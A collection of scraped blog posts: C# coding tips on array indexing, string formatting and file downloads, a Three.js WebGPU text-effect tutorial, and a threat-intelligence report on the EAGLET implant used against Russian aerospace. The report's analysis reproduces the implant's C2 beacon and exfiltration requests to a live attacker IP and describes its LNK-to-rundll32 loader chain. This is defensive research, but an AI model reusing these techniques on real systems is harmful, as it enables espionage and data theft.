Author: post Bina

  • Access items from the end of the array using the ^ operator | Code4IT



    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost.

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ads as possible – I don’t want to bother you with lots of ads, but I still need some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    Say that you have an array of N items and you need to access an element counting from the end of the collection.

    Usually, we tend to use the Length property of the array, and then subtract the number corresponding to the position we want to reach:

    string[] values = {
        "alfa",
        "bravo",
        "charlie",
        "delta",
        "echo",
        "foxtrot",
        "golf"
    };
    
    var echo = values[values.Length - 3];
    

    As you can see, we are accessing the same variable twice in a row: values[values.Length - 3].

    We can simplify that specific line of code by using the ^ operator:

    string[] values = {
        "alfa",
        "bravo",
        "charlie",
        "delta",
        "echo",
        "foxtrot",
        "golf"
    };
    
    var echo = values[^3];
    

    Yes, that’s just syntactic sugar, but it can help make your code more readable. In fact, if you have a look at the IL code generated by both examples, it is perfectly identical. IL is quite difficult to read and understand, but you can confirm that both syntaxes are equivalent by looking at the decompiled C# code:

    C# decompiled code

    Performance is not affected by this operator, so it’s just a matter of readability.

    Clearly, you still have to take care of array bounds – if you access values[^55] you’ll get an IndexOutOfRangeException.
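    If you want to stay on the safe side, you can wrap the access in a small helper that checks the bounds first. A minimal sketch (the helper name is mine, not part of the language):

```csharp
using System;

string ItemFromEnd(string[] values, int fromEnd)
{
    // ^1 is the last element, so valid positions range from 1 to values.Length
    if (fromEnd < 1 || fromEnd > values.Length)
        return null;

    return values[^fromEnd];
}
```

    This way, an out-of-range position returns null instead of throwing an IndexOutOfRangeException.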

    Pay attention: the position is 1-based, so ^1 refers to the last element!

    string[] values = {
        "alfa",
        "bravo",
        "charlie",
        "delta",
        "echo",
        "foxtrot",
        "golf"
    };
    
    Console.WriteLine(values[^1]); //golf
    Console.WriteLine(values[^0]); //IndexOutOfRangeException
    

    Further readings

    Using ^ is a nice trick that many C# developers don’t know. There are some special characters that can help us but are often not used. Like the @ operator!

    🔗 C# Tip: use the @ prefix when a name is reserved

    This article first appeared on Code4IT 🐧

    Wrapping up

    In this article, we’ve learned that just using the right syntax can make our code much more readable.

    But we also learned that not every new addition in the language brings performance improvements to the table.

    I hope you enjoyed this article! Let’s keep in touch on Twitter or on LinkedIn, if you want! 🤜🤛

    Happy coding!

    🐧






  • Format Interpolated Strings | Code4IT



    Interpolated strings are those built with the $ symbol, which you can use to create strings from existing variables or properties. Did you know that you can apply custom formatting to such values?


    As you know, there are many ways to “create” strings in C#. You can use a StringBuilder, you can simply concatenate strings, or you can use interpolated strings.

    Interpolated? WHAT? I’m pretty sure that you’ve already used interpolated strings, even if you did not know the “official” name:

    int age = 31;
    string bio = $"Hi, I'm {age} years old";
    

    That’s it: an interpolated string is one where you can reference a variable or a property within the string definition, using the $ symbol and the {} braces to generate such strings.

    Did you know that you can even format how the interpolated value must be rendered when creating the string? It’s just a matter of specifying the format after the : sign:

    Formatting dates

    The easiest way to learn it is by formatting dates:

    DateTime date = new DateTime(2021,05,23);
    
    Console.WriteLine($"The printed date is {date:yyyy-MM-dd}"); //The printed date is 2021-05-23
    Console.WriteLine($"Another version is {date:yyyy-MMMM-dd}"); //Another version is 2021-May-23
    
    Console.WriteLine($"The default version is {date}"); //The default version is 23/05/2021 00:00:00
    

    Here we have date:yyyy-MM-dd which basically means “format the date variable using the yyyy-MM-dd format”.

    There are, obviously, different ways to format dates, as described on the official documentation. Some of the most useful are:

    • dd: day of the month, in number (from 01 to 31);
    • ddd: abbreviated day name (eg: Mon)
    • dddd: complete day name (eg: Monday)
    • hh: hour in a 12-hour clock (01-> 12)
    • HH: hour in a 24-hour clock (00->23)
    • MMMM: full month name (eg: May)

    and so on.

    Formatting numbers

    Similar to dates, we can format numbers.

    For example, we can format a double number as currency or as a percentage:

    var cost = 12.41;
    Console.WriteLine($"The cost is {cost:C}"); // The cost is £12.41
    
    var variation = -0.254;
    Console.WriteLine($"There is a variation of {variation:P}"); //There is a variation of -25.40%
    

    Again, there are lots of different ways to format numbers:

    • C: currency – it takes the current culture, so it may be Euro, Yen, or whatever currency, depending on the process’ culture;
    • E: exponential number, used for scientific operations
    • P: percentage: as we’ve seen before {1:P} represents 100%;
    • X: hexadecimal
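    A quick sketch of a couple of these specifiers in action (the E output assumes an English-style culture; X is culture-independent):

```csharp
using System;

int flags = 255;
Console.WriteLine($"{flags:X}");  // FF
Console.WriteLine($"{flags:X4}"); // 00FF – pads to 4 hex digits

double n = 12345.678;
Console.WriteLine($"{n:E2}");     // 1.23E+004
```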

    Further readings

    There are too many formats that you can use to convert a value to a string, and we cannot explore all of them here.

    But still, you can have a look at several ways to format date and time in C#

    🔗 Custom date and time format strings | Microsoft Docs

    and, obviously, to format numbers

    🔗 Standard numeric format strings | Microsoft Docs

    This article first appeared on Code4IT 🐧

    Finally, remember that interpolated strings are not the only way to build strings from variables; you can (and should!) also use string.Format:

    🔗 How to use String.Format – and why you should care about it | Code4IT
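    For reference, the interpolated example from the beginning of this article can be rewritten with string.Format and produces the same result:

```csharp
using System;

int age = 31;
string bio = string.Format("Hi, I'm {0} years old", age);
Console.WriteLine(bio); // Hi, I'm 31 years old
```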

    Wrapping up

    I hope you enjoyed this article! Let’s keep in touch on Twitter or on LinkedIn, if you want! 🤜🤛

    Happy coding!

    🐧






  • Ung0901 Targets Russian Aerospace Defense Using Eaglet Implant



    Contents

    • Introduction
    • Initial Findings
    • Infection Chain
    • Technical Analysis
      • Stage 0 – Malicious Email File
      • Stage 1 – Malicious LNK File
      • Stage 2 – Looking into the Decoy File
      • Stage 3 – Malicious EAGLET Implant
    • Hunting and Infrastructure
      • Infrastructural Details
      • Similar Campaigns
    • Attribution
    • Conclusion
    • SEQRITE Protection
    • IOCs
    • MITRE ATT&CK

    Introduction

    SEQRITE Labs APT-Team has recently found a campaign targeting the Russian aerospace industry. The campaign is aimed at employees of the Voronezh Aircraft Production Association (VASO), one of the major aircraft production entities in Russia, via товарно-транспортная накладная (TTN) documents – consignment notes critical to Russian logistics operations. The malware ecosystem involved in this campaign is based on a malicious LNK file and the EAGLET DLL implant, which executes malicious commands and exfiltrates data.

    In this blog, we will explore the technical details of the campaign we encountered during our analysis. We will examine its various stages, starting with a deep dive into the initial infection chain, moving on to the implant used in this campaign, and ending with a final overview of the campaign.

    Initial Findings

    Recently, on the 27th of June, while hunting malicious spear-phishing attachments, our team found a malicious email file that had surfaced on sources like VirusTotal. Further hunting also turned up a malicious LNK file responsible for executing the malicious DLL attachment, whose file type masquerades as a ZIP attachment.

    Looking into the email, we found that the file Транспортная_накладная_ТТН_№391-44_от_26.06.2025.zip, which translates to Transport_Consignment_Note_TTN_No.391-44_from_26.06.2025.zip, is actually a DLL file. Further hunting revealed another file, a shortcut [LNK] file with the same name. We then decided to look into the workings of these files.

    Infection Chain

     

    Technical Analysis

    We will break down the analysis of this campaign into three parts, starting with the malicious EML file, followed by the attachment, i.e., the malicious DLL implant, and finally the LNK file.

    Stage 0 – Malicious Email File.

    Initially, we found a malicious e-mail file named backup-message-10.2.2.20_9045-800282.eml, uploaded from the Russian Federation. Looking into its specifics, we found that the email was sent to an employee at Voronezh Aircraft Production Association (VASO) from a Transport and Logistics Centre, regarding a delivery note.

    Looking into the contents of the email, we found that the message was crafted to deliver news of a recent logistics movement, referencing a consignment note (Товарно-транспортная накладная №391-44 от 26.06.2025), and urging the receiver to prepare for the delivery of a certain cargo in 2-3 days. Besides impersonating an individual, the threat actor included a malicious attachment masquerading as a ZIP file. Upon downloading it, we figured out that it was a malicious DLL implant.

    Apart from the malicious DLL implant, we also hunted down a malicious LNK file with the same name, which we believe was dropped by another spear-phishing attachment and is used to execute this DLL implant, which we have termed EAGLET.

    In the next section, we will look into the malicious LNK file.

    Stage 1 – Malicious LNK File.

    Looking inside the LNK file, we found that it performs a specific set of tasks that finally executes the malicious DLL file and spawns a decoy pop-up on the screen. It does this in the following manner.

    Initially, it uses the powershell.exe binary to run a script in the background that enumerates the masquerading ZIP file, i.e., the malicious EAGLET implant. If it finds the implant, it executes it via the rundll32.exe LOLBIN; otherwise, it recursively looks for the file under %USERPROFILE% and runs it if found, and failing that, it looks under the %TEMP% location.

    Once the DLL implant has been found and executed, the LNK extracts a decoy XLS file embedded within the implant: it reads the 59904 bytes of XLS data stored right after the first 296960 bytes and writes them under the %TEMP% directory as Транспортная_накладная_ТТН_№391-44_от_26.06.2025.xls. This is the purpose of the malicious LNK file; in the next section, we will look into the decoy file.
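    The carving step described above boils down to a simple offset-and-length copy from the implant’s overlay. A minimal C# sketch of the same logic (the helper and file names are illustrative; the offsets come from the analysis above):

```csharp
using System;
using System.IO;

byte[] ExtractOverlay(byte[] implant, int offset, int length)
{
    // Copy `length` bytes starting right after the first `offset` bytes
    byte[] decoy = new byte[length];
    Array.Copy(implant, offset, decoy, 0, length);
    return decoy;
}

// The LNK script reads the 59904-byte XLS stored after the first 296960 bytes:
// byte[] dll = File.ReadAllBytes("implant.zip"); // DLL masquerading as a ZIP
// byte[] xls = ExtractOverlay(dll, 296960, 59904);
// File.WriteAllBytes(Path.Combine(Path.GetTempPath(), "decoy.xls"), xls);
```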

    Stage 2 – Looking into the decoy file.

    In this section, we will look into the XLS decoy file, which has been extracted from the DLL implant.

    Initially, we identified that the referenced .XLS file is associated with a sanctioned Russian entity, Obltransterminal LLC (ООО “Облтранстерминал”), which appears on the U.S. Department of the Treasury’s OFAC SDN (Specially Designated Nationals) list. The organization has been sanctioned under Executive Order 14024 for its involvement in Russia’s military-logistics infrastructure.

    Then, we saw the XLS file contains details about structured fields for recording container number, type, tare weight, load capacity, and seal number, as well as vehicle and platform information. Notably, it includes checkboxes for container status—loaded, empty, or under repair—and a schematic area designated for marking physical damage on the container.

    Then, we can see that the decoy contains a detailed list of container damage codes typically used in Russian logistics operations. These codes cover a wide range of structural and mechanical issues that might be identified during a container inspection. The list includes specific terms such as cracks or punctures (Трещина), deformations of top and bottom beams (Деформация верхних/нижних балок), corrosion (Сквозная коррозия), and the absence or damage of locking rods, hinges, rubber seals, plates, and corner fittings. Each damage type is systematically numbered from 1 to 24, mimicking standardized inspection documentation.

    Overall, the decoy simulates an official Russian container inspection document – specifically, an Equipment Interchange Report (EIR) – used during the transfer or handover of freight containers. It includes structured fields for container specifications, seal numbers, weight, and vehicle data, along with schematic diagrams and a standardized list of 24 damage codes covering everything from cracks and deformations to corrosion and missing parts, associated with Obltransterminal LLC. In the next section, we will look into the EAGLET implant.

    Stage 3 – Malicious EAGLET implant.

    Initially, we loaded the implant into a PE-analysis tool and confirmed that it is a PE file, with the decoy stored inside the overlay section, as we already saw previously.

    Next, looking into the exports of this malicious DLL, we examined the EntryPoint, which unfortunately did not contain anything interesting. The DllEntryPoint, however, led us to DllMain, which did contain interesting code related to malicious behavior.

    The first interesting function basically enumerates information about the target machine.

    In this function, the code creates a unique GUID for the target, which is used to identify the victim. A new GUID is generated every time the implant is executed; this mimics the behavior of a session-id and helps the operator, or threat actor, keep track of the target.

     

    Then, it enumerates the computer name of the target machine, along with the hostname and DNS domain name. Once done, it creates a directory named MicrosoftApppStore under the ProgramData location.

    Next, using CreateThread, it creates a malicious thread responsible for connecting to the command-and-control [C2] IP and much more.

    Next, we can see that the implant uses Windows networking APIs such as WinHttpOpen to initiate an HTTP session, masquerading under an uncommon-looking user-agent string, MicrosoftAppStore/2001.0. This is followed by WinHttpConnect, which tries to connect to the hardcoded command-and-control [C2] server, 185.225.17.104, over port 80; if it fails, it keeps retrying.

    If the implant connects to the C2, it forms a URL path used to send a GET request to the C2 infrastructure. The entire request looks something like this:

    GET /poll?id={randomly-created-GUID}&hostname={hostname}&domain={domain} HTTP/1.1
    Host: 185.225.17.104

    After sending the request, the implant attempts to read the HTTP response from the C2 server, which may contain instructions to perform certain actions.

    Regarding the functionality, the implant supports shell-access which basically gives the C2-operator or threat actor a shell on the target machine, which can be further used to perform malicious activities.

    Another feature of this implant is download, which either downloads malicious content from the server or stages required or interesting files from the target machine. The download mode fetches content from the server and stores it under C:\ProgramData\MicrosoftAppStore\. As the C2 is down while this research is being published, the files that had been served could not be recovered.

    Later, another functionality, separate from the download feature, became evident: the implant exfiltrates files and command results from the target machine. The request body looks something like this:

    POST /result HTTP/1.1
    Host: 185[.]225[.]17[.]104
    Content-Type: application/x-www-form-urlencoded

    id=8b9c0f52-e7d1-4d0f-b4de-fc62b4c4fa6f&hostname=VICTIM-PC&domain=CORP&result=Q29tbWFuZCByZXN1bHQgdGV4dA==

    Therefore, the features are as follows.

    • Command Execution (trigger keyword: cmd:) – executes a shell command received from the C2 server and captures the output. Purpose: Remote Code Execution.
    • File Download (trigger keyword: download:) – downloads a file from a remote location and saves it to C:\ProgramData\MicrosoftAppStore\. Purpose: Payload Staging.
    • Exfiltration (automatic) – sends the result of command execution or download status back to the C2 server via HTTP POST. Purpose: Data Exfiltration.

    That sums up the technical analysis of the EAGLET implant, next, we will look into the other part, which focuses on infrastructural knowledge and hunting similar campaigns.

    Hunting and Infrastructure

    Infrastructural details

    In this section, we will look into infrastructure-related artefacts. The C2 we found, 185[.]225[.]17[.]104, which the EAGLET implant connects to, is located in Romania under ASN 39798 of MivoCloud SRL.

    Looking into it, we found a lot of passive DNS records pointing to historical infrastructure previously associated with a threat cluster linked to TA505, which has been researched by researchers at BinaryDefense. These DNS records suggest that similar or recycled infrastructure has been used in this campaign. Apart from this infrastructural correlation via recycled domains, we also saw some other dodgy domains with DNS records pointing to this same infrastructure. With high confidence, we assess that the current campaign has no correlation with TA505 beyond the aforementioned information.

    Similar to the campaign targeting the aerospace sector, we also found another campaign targeting the Russian military sector through recruitment-themed documents. In that campaign, the threat actor used an EAGLET implant that connects to the C2 188[.]127[.]254[.]44, located in Russia under ASN 56694, belonging to the LLC Smart Ape organization.

    Similar Campaigns

    Campaign 1 – Military Themed Targeting

    Initially, the URL body and many other behavioral artefacts of the implant led us to another set of campaigns, with an essentially identical implant, used to target Russian military recruitment.

    This decoy was extracted from an EAGLET implant named Договор_РН83_изменения.zip, which translates to Contract_RN83_Changes, and which has been targeting individuals and entities related to Russian military recruitment. The decoy highlights multiple advantages of serving, from house mortgages to pensions and more.

    Campaign 2 – EAGLET implant with no decoy embedded

    In the previous campaigns, we saw that the threat entity occasionally drops a malicious LNK that executes the DLL implant and extracts the decoy from the implant’s overlay section; in this case, however, we also saw an implant with no such decoy present inside.

    Along with these, we also saw multiple overlaps between these campaigns and the threat entity known as Head Mare – similar target interests and implant code overlap – which has been targeting Russian-speaking entities and was initially discovered by researchers at Kaspersky.

    Attribution

    Attribution is an essential metric when describing a threat actor or group. It involves analyzing and correlating various domains, including Tactics, Techniques, and Procedures (TTPs), code similarities and reuse, the motivation of the threat actor, and sometimes operational mistakes such as using similar file or decoy nomenclature.

    In our ongoing tracking of UNG0901, we discovered notable similarities and overlaps with the threat group known as Head Mare, as identified by researchers at Kaspersky. Let us explore some of the key overlaps between Head Mare and UNG0901.

    Key Overlaps Between UNG0901 and Head Mare

    1. Tooling Arsenal:

    Researchers at Kaspersky observed that Head Mare often uses a Golang-based backdoor known as PhantomDL, often packed with a software packer such as UPX, with simple yet functional features such as shell, download, upload, and exit. Similarly, UNG0901 has deployed the EAGLET implant, programmed in C++, which shows similar behavior and nearly identical features such as shell, download, and upload.

    2. File-Naming Technique:

    Researchers at Kaspersky observed that the PhantomDL malware is often deployed via spear-phishing with file names such as Contract_kh02_523; similarly, in the campaigns by UNG0901 we witnessed filenames in a similar style, such as Contract_RN83_Changes, along with many more file-naming schemes we found to be similar.

    3. Motivation:

    Head Mare has been targeting important entities related to Russia, and UNG0901 has likewise targeted multiple important entities belonging to Russia.

    Apart from these, there are additional strong similarities that reinforce the connection between these two threat entities; therefore, we assess that UNG0901 shares resources and many other similarities with Head Mare, targeting Russian governmental and non-governmental entities.

    Conclusion

    UNG0901, or Unknown-Group-901, demonstrates a targeted cyber operation against Russia’s aerospace and defense sectors, using spear-phishing emails and a custom EAGLET DLL implant for espionage and data exfiltration. UNG0901 also overlaps with Head Mare, showing multiple similarities such as decoy nomenclature and much more.

    SEQRITE Protection

    IOCs

    LNK
    • Договор_РН83_изменения.pdf.lnk – a9324a1fa529e5c115232cbbc60330d37cef5c20860bafc63b11e14d1e75697c
    • Транспортная_накладная_ТТН_№391-44_от_26.06.2025.xls.lnk – 4d4304d7ad1a8d0dacb300739d4dcaade299b28f8be3f171628a7358720ca6c5

    DLL
    • Договор_РН83_изменения.zip – 204544fc8a8cac64bb07825a7bd58c54cb3e605707e2d72206ac23a1657bfe1e
    • Транспортная_накладная_ТТН_№391-44_от_26.06.2025.zip – 01f12bb3f4359fae1138a194237914f4fcdbf9e472804e428a765ad820f399be
    • N/A – b683235791e3106971269259026e05fdc2a4008f703ff2a4d32642877e57429a
    • Договор_РН83_изменения.zip – 413c9e2963b8cca256d3960285854614e2f2e78dba023713b3dd67af369d5d08

    Decoy [XLS/PDF]
    • temp.pdf – 02098f872d00cffabb21bd2a9aa3888d994a0003d3aa1c80adcfb43023809786
    • sample_extracted.xls – f6baa2b5e77e940fe54628f086926d08cc83c550cd2b4b34b4aab38fd79d2a0d
    • 80650000 – 3e93c6cd9d31e0428085e620fdba017400e534f9b549d4041a5b0baaee4f7aff
    • sample_extracted.xls – c3caa439c255b5ccd87a336b7e3a90697832f548305c967c0c40d2dc40e2032e
    • sample_extracted.xls – 44ada9c8629d69dd3cf9662c521ee251876706ca3a169ca94c5421eb89e0d652
    • sample_extracted.xls – e12f7ef9df1c42bc581a5f29105268f3759abea12c76f9cb4d145a8551064204
    • sample_extracted.xls – a8fdc27234b141a6bd7a6791aa9cb332654e47a57517142b3140ecf5b0683401

    Email-File
    • backup-message-10.2.2.20_9045-800282.eml – ae736c2b4886d75d5bbb86339fb034d37532c1fee2252193ea4acc4d75d8bfd7

    MITRE ATT&CK

    • Initial Access – Spearphishing Attachment (T1566.001): malicious .EML file sent to a VASO employee, impersonating a logistics center with a TTN document lure.
    • Execution – System Binary Proxy Execution: Rundll32 (T1218.011): DLL implant executed via the trusted rundll32.exe LOLBIN, called from the .LNK file.
    • Execution – PowerShell (T1059.001): used for locating and launching the DLL implant from multiple fallback directories.
    • Persistence – Implant in ZIP-disguised DLL [Custom]: DLL masquerades as a .ZIP file; persistence implied via operator-controlled executions.
    • Defense Evasion – Masquerading (T1036): implant disguised as a ZIP; decoy XLS used to simulate sanctioned logistics paperwork.
    • Discovery – System Information Discovery (T1082): gathers hostname, computer name, and domain; creates a victim GUID to identify the target.
    • Discovery – Domain Trust Discovery (T1482): enumerates the victim’s DNS domain for network profiling.
    • Command & Control – Application Layer Protocol: HTTP (T1071.001): communicates with the C2 via HTTP; uses the MicrosoftAppStore/2001.0 User-Agent.
    • Collection – Data from Local System (T1005): exfiltrates system details and file contents per the threat actor’s command triggers.
    • Exfiltration – Exfiltration Over C2 Channel (T1041): POST requests to the /result endpoint on the C2 with encoded command results or exfiltrated data.
    • Impact – Data Exfiltration (T1537): targeted data theft from the Russian aerospace sector.

    Authors:

    Subhajeet Singha

    Sathwik Ram Prakki




  • How to download an online file and store it on file system with C# | Code4IT



    Downloading a file from a remote resource seems an easy task: download the byte stream and copy it to a local file. Beware of edge cases!


    Downloading files from an online source and saving them on the local machine seems an easy task.

    And guess what? It is!

    In this article, we will learn how to download an online file, perform some operations on it – such as checking its file extension – and store it in a local folder. We will also learn how to deal with edge cases: what if the file does not exist? Can we overwrite existing files?

    How to download a file stream from an online resource using HttpClient

    Ok, this is easy: if you have the file URL, you can simply download it using HttpClient.

    HttpClient httpClient = new HttpClient();
    Stream fileStream = await httpClient.GetStreamAsync(fileUrl);
    

    Instantiating HttpClient directly can cause some trouble, especially under heavy load, since creating many instances can exhaust the available sockets. As a matter of fact, using HttpClientFactory is preferred, as we’ve already explained in a previous article.

    But, ok, it looks easy – way too easy! There are two more parts to consider.

    How to handle errors while downloading a stream of data

    You know, shit happens!

    There are at least 2 cases that stop you from downloading a file: the file does not exist or the file requires authentication to be accessed.

    In both cases, an HttpRequestException is thrown, with the following stack trace:

    at System.Net.Http.HttpResponseMessage.EnsureSuccessStatusCode()
    at System.Net.Http.HttpClient.GetStreamAsyncCore(HttpRequestMessage request, CancellationToken cancellationToken)
    

    As you can see, we are implicitly calling EnsureSuccessStatusCode while getting the stream of data.

    You can tell the consumer that we were not able to download the content in two ways: throw a custom exception or return Stream.Null. We will use Stream.Null for the sake of this article.

    Note: always throw custom exceptions and add context to them: this way, you’ll add more useful info to consumers and logs, and you can hide implementation details.
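    As a sketch of that advice, a custom exception could wrap the failure and carry the URL as context (the type name is mine, not from the article):

```csharp
using System;

public class FileDownloadException : Exception
{
    public string FileUrl { get; }

    public FileDownloadException(string fileUrl, Exception innerException)
        : base($"Unable to download the file at {fileUrl}", innerException)
    {
        FileUrl = fileUrl;
    }
}
```

    The consumer can then catch FileDownloadException and log the URL without knowing anything about the underlying HttpClient call.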

    So, let me refactor the part that downloads the file stream and put it in a standalone method:

    async Task<Stream> GetFileStream(string fileUrl)
    {
        HttpClient httpClient = new HttpClient();
        try
        {
            Stream fileStream = await httpClient.GetStreamAsync(fileUrl);
            return fileStream;
        }
        catch (HttpRequestException)
        {
            return Stream.Null;
        }
    }
    

    so that we can use Stream.Null to check for the existence of the stream.

    How to store a file in your local machine

    Now we have our stream of data. We need to store it somewhere.

    We will need to copy our input stream to a FileStream object, placed within a using block.

    using (FileStream outputFileStream = new FileStream(path, FileMode.Create))
    {
        await fileStream.CopyToAsync(outputFileStream);
    }
    

    Possible errors and considerations

    When creating the FileStream instance, we have to pass the constructor both the full path of the destination file, including the file name, and FileMode.Create, which tells the stream what type of operations should be supported.

    FileMode is an enum coming from the System.IO namespace, and has different values. Each value fits best for some use cases.

    public enum FileMode
    {
        CreateNew = 1,
        Create,
        Open,
        OpenOrCreate,
        Truncate,
        Append
    }
    

    Again, there are some edge cases that we have to consider:

    • the destination folder does not exist: you will get a DirectoryNotFoundException. You can easily fix it by calling Directory.CreateDirectory to generate the whole hierarchy of folders defined in the path;
    • the destination file already exists: depending on the value of FileMode, you will see different behavior. FileMode.Create overwrites the file, while FileMode.CreateNew throws an IOException if the file already exists.

    Full Example

    It’s time to put the pieces together:

    async Task DownloadAndSave(string sourceFile, string destinationFolder, string destinationFileName)
    {
        Stream fileStream = await GetFileStream(sourceFile);
    
        if (fileStream != Stream.Null)
        {
            await SaveStream(fileStream, destinationFolder, destinationFileName);
        }
    }
    
    async Task<Stream> GetFileStream(string fileUrl)
    {
        HttpClient httpClient = new HttpClient();
        try
        {
            Stream fileStream = await httpClient.GetStreamAsync(fileUrl);
            return fileStream;
        }
        catch (HttpRequestException)
        {
            return Stream.Null;
        }
    }
    
    async Task SaveStream(Stream fileStream, string destinationFolder, string destinationFileName)
    {
        if (!Directory.Exists(destinationFolder))
            Directory.CreateDirectory(destinationFolder);
    
        string path = Path.Combine(destinationFolder, destinationFileName);
    
        using (FileStream outputFileStream = new FileStream(path, FileMode.CreateNew))
        {
            await fileStream.CopyToAsync(outputFileStream);
        }
    }
    

    Bonus tips: how to deal with file names and extensions

    You have the file URL, and you want to get its extension and its plain file name.

    You can use some methods from the Path class:

    string image = "https://website.com/csharptips/format-interpolated-strings/featuredimage.png";
    Path.GetExtension(image); // .png
    Path.GetFileNameWithoutExtension(image); // featuredimage
    

    But not every image has a file extension. For example, Twitter cover images have this format: https://pbs.twimg.com/profile_banners/1164441929679065088/1668758793/1080x360

    string image = "https://pbs.twimg.com/profile_banners/1164441929679065088/1668758793/1080x360";
    Path.GetExtension(image); // [empty string]
    Path.GetFileNameWithoutExtension(image); // 1080x360
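    When the extension can be missing, a small defensive helper can fall back to a default one. This sketch (the helper name and the ".png" default are illustrative, not from the original post) builds on the two Path methods shown above:

    ```csharp
    using System;
    using System.IO;

    static class FileNameHelper
    {
        // Returns the file name with a guaranteed extension, falling back to a
        // caller-provided default (e.g. ".png") when the URL carries none.
        public static string EnsureExtension(string url, string defaultExtension)
        {
            string name = Path.GetFileNameWithoutExtension(url);
            string extension = Path.GetExtension(url);

            if (string.IsNullOrEmpty(extension))
                extension = defaultExtension;

            return name + extension;
        }
    }
    ```

    For the Twitter cover URL above, EnsureExtension(image, ".png") would produce 1080x360.png, while the featuredimage.png URL keeps its original extension.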
    

    Further readings

    As I said, you should not instantiate a new HttpClient() every time. You should use HttpClientFactory instead.

    If you want to know more details, I’ve got an article for you:

    🔗 C# Tip: use IHttpClientFactory to generate HttpClient instances | Code4IT

    This article first appeared on Code4IT 🐧

    Wrapping up

    This was a quick article, quite easy to understand – I hope!

    My main point here is that not everything is always as easy as it seems – you should always consider edge cases!

    I hope you enjoyed this article! Let’s keep in touch on Twitter or on LinkedIn, if you want! 🤜🤛

    Happy coding!

    🐧






  • Interactive Text Destruction with Three.js, WebGPU, and TSL




    When Flash was taken from us all those years ago, it felt like losing a creative home — suddenly, there were no tools left for building truly interactive experiences on the web. In its place, the web flattened into a static world of HTML and CSS.

    But those days are finally behind us. We’re picking up where we left off nearly two decades ago, and the web is alive again with rich, immersive experiences — thanks in large part to powerful tools like Three.js.

    I’ve been working with images, video, and interactive projects for 15 years, using things like Processing, p5.js, OpenFrameworks, and TouchDesigner. Last year, I added Three.js to the mix as a creative tool, and I’ve been loving the learning process. That ongoing exploration leads to little experiments like the one I’m sharing in this tutorial.

    Project Structure

    The structure of our script is going to be simple: one function to preload assets, and another one to build the scene.

    Since we’ll be working with 3D text, the first thing we need to do is load a font in .json format — the kind that works with Three.js.

    To convert a .ttf font into that format, you can use the Facetype.js tool, which generates a .typeface.json file.

    const Resources = {
    	font: null
    };
    
    function preload() {
    
    	const _font_loader = new FontLoader();
    	_font_loader.load( "../static/font/Times New Roman_Regular.json", ( font ) => {
    
    		Resources.font = font;
    		init();
    
    	} );
    
    }
    
    function init() {
    
    }
    
    window.onload = preload;

    Scene setup & Environment

    A classic Three.js scene — the only thing to keep in mind is that we’re working with the Three.js Shading Language (TSL), which means our renderer needs to be a WebGPURenderer.

    const scene = new THREE.Scene();
    const camera = new THREE.PerspectiveCamera(75, window.innerWidth / window.innerHeight, 0.1, 1000);
    const renderer = new THREE.WebGPURenderer({ antialias: true });
    
    document.body.appendChild(renderer.domElement);
    
    renderer.setSize(window.innerWidth, window.innerHeight);
    camera.position.z = 5;
    
    scene.add(camera);

    Next, we’ll set up the scene environment to get some lighting going.

    To keep things simple and avoid loading more assets, we’ll use the default RoomEnvironment that “comes” with Three.js. We’ll also add a DirectionalLight to the scene.

    const environment = new RoomEnvironment();
    const pmremGenerator = new THREE.PMREMGenerator(renderer);
    scene.environment = pmremGenerator.fromSceneAsync(environment).texture;
    
    scene.environmentIntensity = 0.8;
    
    const   light = new THREE.DirectionalLight("#e7e2ca",5);
    light.position.x = 0.0;
    light.position.y = 1.2;
    light.position.z = 3.86;
    
    scene.add(light);

    TextGeometry

    We’ll use TextGeometry, which lets us create 3D text in Three.js.

    It uses a JSON font file (which we loaded earlier with FontLoader) and is configured with parameters like size, depth, and letter spacing.

    const text_geo = new TextGeometry("NUEVOS",{
        font:Resources.font,
        size:1.0,
        depth:0.2,
        bevelEnabled: true,
        bevelThickness: 0.1,
        bevelSize: 0.01,
        bevelOffset: 0,
        bevelSegments: 1
    }); 
    
    const mesh = new THREE.Mesh(
        text_geo,
        new THREE.MeshStandardMaterial({ 
            color: "#656565",
            metalness: 0.4, 
            roughness: 0.3
        })
    );
    
    scene.add(mesh);

    By default, the origin of the text sits at (0, 0), but we want it centered.
    To do that, we need to compute its BoundingBox and manually apply a translation to the geometry:

    text_geo.computeBoundingBox();
    const centerOffset = - 0.5 * ( text_geo.boundingBox.max.x - text_geo.boundingBox.min.x );
    const centerOffsety = - 0.5 * ( text_geo.boundingBox.max.y - text_geo.boundingBox.min.y );
    text_geo.translate( centerOffset, centerOffsety, 0 );

    Now that we have the mesh and material ready, we can move on to the function that lets us blow everything up 💥

    Three.js Shading Language

    I really love TSL — it’s closed the gap between ideas and execution, in a context that’s not always the friendliest… shaders.

    The effect we’re going to implement deforms the geometry’s vertices based on the pointer’s position, and uses spring physics to animate those deformations in a dynamic way.

    But before we get to that, let’s grab a few attributes we’ll need to make everything work properly:

    //  Number of vertices in the geometry — needed to size the buffers below
    const count = text_geo.attributes.position.count;
    
    //  Original position of each vertex — we’ll use it as a reference
    //  so unaffected vertices can "return" to their original spot
    const initial_position = storage( text_geo.attributes.position, "vec3", count );
    
    //  Normal of each vertex — we’ll use this to know which direction to "push" in
    const normal_at = storage( text_geo.attributes.normal, "vec3", count );

    Next, we’ll create a storage buffer to hold the simulation data — and we’ll also write a function.
    But not a regular JavaScript function — this one’s a compute function, written in the context of TSL.

    It runs on the GPU and we’ll use it to set up the initial values for our buffers, getting everything ready for the simulation.

    // In this buffer we’ll store the modified positions of each vertex —
    // in other words, their current state in the simulation.
    const   position_storage_at = storage(new THREE.StorageBufferAttribute(count,3),"vec3",count);   
    
    const compute_init = Fn( ()=>{
    
    	position_storage_at.element( instanceIndex ).assign( initial_position.element( instanceIndex ) );
    
    } )().compute( count );
    
    // Run the function on the GPU. This runs compute_init once per vertex.
    renderer.computeAsync( compute_init );

    Now we’re going to create another one of these functions — but unlike the previous one, this one will run inside the animation loop, since it’s responsible for updating the simulation on every frame.

    This function runs on the GPU and needs to receive values from the outside — like the pointer position, for example.

    To send that kind of data to the GPU, we use what’s called uniforms. They work like bridges between our “regular” code and the code that runs inside the GPU shader.

    They’re defined like this:

    const u_input_pos = uniform(new THREE.Vector3(0,0,0));
    const u_input_pos_press = uniform(0.0);

    With this, we can calculate the distance between the pointer position and each vertex of the geometry.

    Then we clamp that value so the deformation only affects vertices within a certain radius.
